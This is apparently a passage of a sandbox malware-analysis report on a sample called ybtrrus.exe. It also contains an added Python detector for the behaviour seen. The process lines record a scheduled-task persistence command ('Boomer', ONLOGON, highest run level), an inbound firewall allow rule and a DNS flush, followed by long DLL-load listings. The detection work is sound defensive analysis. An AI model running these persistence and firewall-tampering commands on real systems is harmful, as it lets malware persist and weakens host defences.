Source: C:\pnVcakKiqh\ybtrrus.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Query /TN "Boomer"
Source: C:\pnVcakKiqh\ybtrrus.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C netsh advfirewall firewall add rule name="ybtrrus" dir=in action=allow program="C:\pnVcakKiqh\ybtrrus.exe" enable=yes profile=any
Source: C:\pnVcakKiqh\ybtrrus.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ipconfig /flushdns
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Create /F /RL HIGHEST /TN "Boomer" /TR "C:\iDQiPwFWUp\ybtrrus.exe" /SC ONLOGON /DELAY 0001:00
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="ybtrrus" dir=in action=allow program="C:\iDQiPwFWUp\ybtrrus.exe" enable=yes profile=any
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /flushdns
Source: C:\iDQiPwFWUp\ybtrrus.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Query /TN "Boomer"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="ybtrrus" dir=in action=allow program="C:\pnVcakKiqh\ybtrrus.exe" enable=yes profile=any
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /flushdns
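The scheduled-task, firewall and DNS-flush command lines listed above form one recognisable persistence sequence: an ONLOGON task created with /RL HIGHEST that points at an executable in a random root-level directory, an inbound firewall allow rule for that same executable, and a DNS cache flush. The Python below is an added example, not part of the sandbox's tooling or of the sample: it parses "Process created" lines in the report's own format and flags that sequence. The rule names, the severities and the TRUSTED_PREFIXES list are assumptions made for the example; the input lines are copied from the report.

```python
"""Flag the persistence / firewall-tampering sequence seen in the report's
'Process created' lines. Added example; rule names, severities and
TRUSTED_PREFIXES are assumptions, the input lines are copied from the report."""
import re
from dataclasses import dataclass

# Constructed input: 'Process created' lines copied from the report above.
REPORT_LINES = [
    r'Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\iDQiPwFWUp\ybtrrus.exe "C:\iDQiPwFWUp\ybtrrus.exe"',
    r'Source: C:\iDQiPwFWUp\ybtrrus.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Query /TN "Boomer"',
    r'Source: C:\iDQiPwFWUp\ybtrrus.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C SCHTASKS /Create /F /RL HIGHEST /TN "Boomer" /TR "C:\iDQiPwFWUp\ybtrrus.exe" /SC ONLOGON /DELAY 0001:00',
    r'Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="ybtrrus" dir=in action=allow program="C:\iDQiPwFWUp\ybtrrus.exe" enable=yes profile=any',
    r'Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /flushdns',
    r'Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1',
]

LINE_RE = re.compile(r'^Source: (?P<parent>\S+) Process created: (?P<image>\S+) (?P<cmdline>.*)$')

# Directories a legitimate logon task or inbound firewall exception normally
# points into (assumption for the example; tune to the environment).
TRUSTED_PREFIXES = ('c:\\windows\\', 'c:\\program files\\', 'c:\\program files (x86)\\')


@dataclass(frozen=True)
class Finding:
    rule: str
    severity: str
    parent: str
    image: str
    target: str


def arg_value(cmdline, key):
    """Value following a switch such as /TR or program=, quoted or bare."""
    m = re.search(re.escape(key) + r'\s*(?:"([^"]*)"|(\S+))', cmdline, re.I)
    if not m:
        return None
    return m.group(1) if m.group(1) is not None else m.group(2)


def parse_delay(delay):
    """schtasks /DELAY takes mmmm:ss; return the delay in seconds."""
    minutes, seconds = delay.split(':')
    return int(minutes) * 60 + int(seconds)


def is_untrusted_path(path):
    """True when the path is outside the directories in TRUSTED_PREFIXES."""
    return not path.lower().startswith(TRUSTED_PREFIXES)


def evaluate(parent, image, cmdline):
    """Apply the three rules to one process-creation record."""
    low = cmdline.lower()
    if 'schtasks' in low and '/create' in low:
        target = arg_value(cmdline, '/TR') or ''
        if '/rl highest' in low and '/sc onlogon' in low and is_untrusted_path(target):
            delay = arg_value(cmdline, '/DELAY')
            seconds = parse_delay(delay) if delay else 0
            return Finding('schtasks_onlogon_highest', 'high', parent, image,
                           f'{target} (delay {seconds}s)')
    if 'netsh' in low and 'advfirewall firewall add rule' in low:
        program = arg_value(cmdline, 'program=') or ''
        if 'action=allow' in low and 'dir=in' in low and is_untrusted_path(program):
            return Finding('firewall_inbound_allow', 'high', parent, image, program)
    if 'ipconfig' in low and '/flushdns' in low:
        # Weak on its own; meaningful when it follows the two rules above.
        return Finding('dns_cache_flush', 'low', parent, image, cmdline.strip())
    return None


def analyze(lines):
    """Return one Finding per matching line, de-duplicated, in report order."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        f = evaluate(m['parent'], m['image'], m['cmdline'])
        if f and f not in findings:
            findings.append(f)
    return findings


if __name__ == '__main__':
    for f in analyze(REPORT_LINES):
        print(f'[{f.severity:4}] {f.rule:24} parent={f.parent} -> {f.image}: {f.target}')
```

Two caveats when reading the matches: the schtasks /DELAY value is mmmm:ss, so 0001:00 fires the task one minute after logon, and /RL HIGHEST only yields an elevated token when the task's account is an administrator. Likewise netsh advfirewall firewall add rule requires administrative rights, so whether the inbound exception actually landed depends on the token the dropper ran under; the report records the attempt, not its result.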
Source: C:\Windows\System32\loaddll32.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\loaddll32.exe Section loaded: secur32.dll
Source: C:\Windows\System32\loaddll32.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\loaddll32.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\loaddll32.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\loaddll32.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\loaddll32.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: apphelp.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: version.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: mpr.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: wininet.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: wsock32.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: winmm.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: uxtheme.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: devobj.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: msasn1.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: c_is2022.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: c_g18030.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: c_gsm7.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: c_iscii.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: netapi32.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: netutils.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: olepro32.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: msimg32.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: kernel.appcore.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: windows.storage.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: wldp.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: unrar.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: 7zxa.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: winhttp.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: shfolder.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: iphlpapi.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: magnification.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: wtsapi32.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: d3d9.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: dwmapi.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: dwmapi.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: security.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: secur32.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: sspicli.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: colorui.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: mscms.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: userenv.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: coloradapterclient.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: compstui.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: inetres.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: textshaping.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: windowscodecs.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: propsys.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: profapi.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: wkscli.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: cscapi.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: winsta.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: fwpuclnt.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: idndl.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: mlang.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: textinputframework.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: coreuicomponents.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: coremessaging.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: ntmarta.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: coremessaging.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: wintypes.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: wintypes.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: wintypes.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: edputil.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: urlmon.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: iertutil.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: srvcli.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: windows.staterepositoryps.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: appresolver.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: bcp47langs.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: slc.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: userenv.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: sppc.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: onecorecommonproxystub.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: wbemcomn.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: sxs.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: napinsp.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: pnrpnsp.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: wshbth.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: nlaapi.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: mswsock.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: dnsapi.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: winrnr.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: rasadhlp.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: amsi.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: d3d10warp.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: resourcepolicyclient.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: dxcore.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: dcomp.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: apphelp.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: version.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: mpr.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: wininet.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: wsock32.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: winmm.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: uxtheme.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: devobj.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: msasn1.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: c_is2022.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: c_g18030.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: c_gsm7.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: c_iscii.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: netapi32.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: netutils.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: olepro32.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: msimg32.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: kernel.appcore.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: windows.storage.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: wldp.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: unrar.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: 7zxa.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: winhttp.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: shfolder.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: iphlpapi.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: magnification.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: wtsapi32.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: d3d9.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: dwmapi.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: dwmapi.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: security.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: secur32.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: sspicli.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: colorui.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: mscms.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: userenv.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: coloradapterclient.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: compstui.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: inetres.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: textshaping.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: windowscodecs.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: propsys.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: profapi.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: wkscli.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: cscapi.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: winsta.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: fwpuclnt.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: idndl.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: mlang.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: edputil.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: urlmon.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: iertutil.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: srvcli.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: textinputframework.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: coreuicomponents.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: coremessaging.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: ntmarta.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: coremessaging.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: wintypes.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: wintypes.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: wintypes.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: windows.staterepositoryps.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: appresolver.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: bcp47langs.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: slc.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: userenv.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: sppc.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: onecorecommonproxystub.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: wbemcomn.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: sxs.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: napinsp.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: pnrpnsp.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: wshbth.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: nlaapi.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: mswsock.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: dnsapi.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: winrnr.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: rasadhlp.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: amsi.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: d3d10warp.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: resourcepolicyclient.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: dxcore.dll
Source: C:\pnVcakKiqh\ybtrrus.exe Section loaded: dcomp.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: ifmon.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: mprapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rasmontr.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: mfc42u.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: authfwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: firewallapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: fwbase.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: dhcpcmonitor.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: dot3cfg.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: dot3api.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: onex.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: eappcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: eappprxy.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: fwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: hnetmon.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: netshell.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: netsetupapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: netiohlp.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: nshhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: httpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: nshipsec.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: activeds.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: polstore.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: winipsec.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: adsldpc.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: nshwfp.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: p2pnetsh.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: p2p.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rpcnsh.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: whhelper.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wlancfg.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wlanapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wshelper.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wevtapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: peerdistsh.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wcmapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rmclient.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: mobilenetworking.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: slc.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: ktmw32.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: mprmsg.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dnsapi.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: version.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: mpr.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: wininet.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: wsock32.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: winmm.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: uxtheme.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: devobj.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: msasn1.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: c_is2022.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: c_g18030.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: c_gsm7.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: c_iscii.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: netapi32.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: netutils.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: olepro32.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: msimg32.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: kernel.appcore.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: windows.storage.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: wldp.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: unrar.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: 7zxa.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: winhttp.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: shfolder.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: iphlpapi.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: magnification.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: wtsapi32.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: d3d9.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: dwmapi.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: security.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: secur32.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: sspicli.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: colorui.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: mscms.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: userenv.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: coloradapterclient.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: compstui.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: inetres.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: textshaping.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: windowscodecs.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: propsys.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: profapi.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: wkscli.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: cscapi.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: winsta.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: fwpuclnt.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: idndl.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: ifmon.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: iphlpapi.dll
